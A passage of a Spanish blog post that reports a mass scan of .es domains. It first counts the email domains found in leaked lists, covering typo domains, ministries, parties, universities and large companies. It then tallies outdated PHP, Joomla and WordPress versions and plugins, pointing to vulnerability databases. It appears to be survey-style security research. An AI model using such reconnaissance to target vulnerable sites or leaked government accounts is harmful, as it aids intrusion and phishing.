522 hotmai.es 281 homail.es 168 hotmeil.es 142 hotmal.es 128 yaho.es 119 outlok.es 118 hotmil.es 96 yahho.es 93 hotamil.es 91 outloo.es 89 hormail.es 82 htmail.es 79 yaoo.es 77 hoymail.es 73 autlook.es 65 hotmial.es 56 otmail.es 55 gemail.es 54 outook.es 54 outllok.es 52 oulook.es 50 holmail.es 48 outloock.es 42 hitmail.es 40 hotamail.es 39 yhoo.es 39 uotlook.es 39 gotmail.es 38 hotail.es 37 htomail.es 36 outlock.es 35 outlook.com.es 35 otlook.es 31 hotmsil.es 31 hayoo.es 30 hotmaill.es 29 hptmail.es 27 jotmail.es 27 ahoo.es 26 yahooo.es 25 homtail.es 24 yohoo.es 23 hotnail.es 21 utlook.es 20 yhaoo.es 19 yahhoo.es 18 jahoo.es 17 yayoo.es 17 yajoo.es 17 hotmali.es 16 tahoo.es 16 holtmail.es 16 hoitmail.es 15 hotmaul.es 14 outloook.es 14 hotmaol.es 13 wanado.es 13 outoolk.es 13 outlokk.es 13 houtlook.es 13 hotmaiil.es 13 hotmaail.es 13 hootmail.es 13 hoail.es 13 hhotmail.es 12 ouylook.es 12 hottmail.es 12 hotmailo.es 12 hotmail.es.es 11 outlool.es 11 hotrmail.es 11 hotmael.es 11 hot.es 11 hmail.es 10 hotmmail.es 9 gmeil.es 8 qutlook.es 8 hatmail.es 8 gmil.es 8 gamil.es
...y hay muchos mas.
El siguiente paso fue comenzar a buscar políticos, ministerios, ayuntamientos y demás. Al 98% revisado (es imposible comprobar los 5500 dominios diferentes) encontramos:
143 andaluciajunta.es 34 juntadeandalucia.es 34 jerez.es 29 gva.es 23 pp.es 23 et.mde.es 14 edu.xunta.es 14 cgac.es 12 carm.es 11 fn.mde.es 10 sescam.jccm.es 8 sevilla.es 8 oc.mde.es 7 terrra.es 7 murcia.es 7 ea.mde.es 6 xunta.es 6 munimadrid.es 6 guardiacivil.es 6 cv.gva.es 6 badajoz.es 6 aragon.es 5 madrid.es 5 justicia.es 5 fomento.es 5 castillalamancha.es 4 valencia.es 4 salud.aragon.es 4 jccm.es 3 diputada.congreso.es 2 diputada.congreso.es
Universidades (como os aburris):
54 alumni.uv.es 39 alu.ua.es 38 usal.es 29 correo.ugr.es 26 um.es 26 uco.es 24 us.es 23 uji.es 20 unizar.es 18 uv.es 17 ugr.es 17 alumni.unav.es 16 ucm.es 13 alum.us.es 13 alumnos.unex.es 12 opendeusto.es 12 udc.es 11 upv.es 11 estudiantes.unileon.es 10 unex.es 10 ehu.es 10 alumnos.uc3m.es 9 alumno.uned.es 9 alumnos.upm.es 8 uniovi.es 8 uca.es 8 alumnos.unican.es 8 alumnos.uchceu.es 8 alumnes.udl.es 7 ull.es 7 uam.es 6 unileon.es 6 uah.es 6 ua.es 6 estumail.ucm.es 6 cam.upv.es 5 rai.usc.es 5 estudiante.uam.es 5 postal.uv.es 5 mail.ucv.es 4 uvigo.es 4 urjc.es 4 ual.es
Empresas del IBEX:
27 iberia.es 19 endesa.es 16 renfe.es 15 adif.es 8 indra.es 7 aena.es 6 ohl.es 6 banesto.es 5 cajamar.es 5 bankinter.es 4 gruposantander.es 4 lacaixa.es
En Pastebin han aparecido multitud de listados
...Siguiendo con el post anterior...
No todos los servidores responden sobre las tecnologías web que albergan (ASP, PHP, etc). De los 1.414.996, solo 589.092 respondieron y de ellos:
ASP no aporta información de sus versiones, por lo que no podemos conocer nada de su antigüedad. Sobre PHP Whatweb nos reporta bastante información, entre ella, las versiones de PHP instaladas.
Acumulando, encontramos que las versiones más comunes de PHP en los dominios ".es" son:
La fecha que vemos encima de cada versión es la fecha en que dejaron de tener soporte según http://php.net/releases/. De hecho si calculamos esto a lo largo de los 216000 version que conocemos, encontramos el siguiente gráfico:
Como vemos el 14 de Agosto de 2014 se dejó de dar soporte a 5.3.29 y con esta version, un total de 217000 dominios .es se encontraron sin soporte PHP. En la actualidad, únicamente las versiones 5.4, 5.5 y 5.6 tienen soporte activo.
Si acumulamos por familias:
En cuanto a los CMS, solo 192408 respondieron algún tipo de información. Entre ellos:
Ahora bien, lo mas interesante vino al descubrir las versiones de los servidores web, CMS. Algunos de ellos no daban información relevante (como debe ser), por ejemplo los de 1and1, los Drupal (el 99,99% devuelven "Drupal 7") o los Prestashop. Pero los Joomla! y sobre todo los Wordpress, son una mina.
De Joomla! se obtuvo información de 30984 CMS. De ellos 21847 no aportaban información relevante sobre la versión instalada. Pero otros 9137 nos dijeron:
El script no aporta información de las subversiones de Joomla! (Tal vez es una posible linea de estudio futuro), por lo que nos tenemos que conformar con las familias.
En cualquier caso, hay que recordar que Joomla! 1.5 se lanzó en Enero de 2008 y se le dejó de dar soporte en Diciembre de 2012. De hecho a las versiones 1.6 y 1.7 también se les dejó de dar soporte en 2012 y la única actualmente con soporte oficial son las versiones 3.3 y 3.4 de las cuales apenas hay 27 encontrados en este escaneo (0% indica la gráfica).
La razón de este numero tan bajo probablemente sea porque los Joomla! 3 sean los que no devuelven información, pero no puedo afirmar ni desmentir tal cosa.
Vaya por delante que no tengo ni idea de Wordpress por lo que puede que a lo largo de las siguientes linea realice alguna afirmación que no tenga ni pies ni cabeza. Una vez dicho esto, entre los datos que aporto el estudio también estaban las versiones instaladas de Wordpress. Las versiones más utilizadas (en el momento del estudio) fueron:
Hay que decir que las versiones de Wordpress encontradas estan bastante actualizadas. En https://wordpress.org/news/category/releases/ encontramos las fechas de publicación. De estas 9 versiones más implantadas. Solo una La version 3.5.1 tendría más de un año de antigüedad. En concreto fué lanzada el 24 de Enero de 2013.
En https://wpvulndb.com/wordpresses tenemos un listado de vulnerabilidades en las distintas versiones de Wordpress. Así, por ejemplo vemos que entre las 3 primeras, la 4.1.1 tiene reportadas 3 vulnerabilidades, la 4.0.1, dos vulnerabilidad reportadas, la 4.1.2 una, mientras que la version 3.5.1, la que tiene mas de un año de antiguedad, se han reportado 17 vulnerabilidades...
Pero este gráfico muestra un universo de 45.000. En los Los 30.000 restantes encontramos gran cantidad de versiones antiguas. Agrupando por familias vemos que sigue habiendo mucho Wordpress 3 y algún que otro Wordpress 2:
De hecho acumulando versiones vemos que el 81% de los wordpress tienen una antiguedad (de fecha de salida) de menos de 2 años, pero un 16% (un total de 12376 implantaciones) cuenta aún con una version de Wordpress de más de 2 años de antigüedad que, a buen seguro, tendrá un gran numero de vulnerabilidades.
Pero no solo tenemos información de las versiones de Wordpress. Si nos fijamos en la información devuelta de por Whatweb, encontramos que nos informa de alguna plugins instalados (me imagino que no todos). En total más de 400 plugins diferentes instalados en 17378 Wordpress que aportaron este tipo de información. Todos ellos con sus respectivas versiones... Los plugins más instalados fueron:
En wpvulndb tambien se reportan vulnerabilidades en los plugins de Wordpress. Mismamente WooCommerce tiene reportadas 8 vulnerabilidades y WPML tiene una vulnerabilidad recientemente reportada.
Un escaneo de este tipo aporta mucha información muy interesant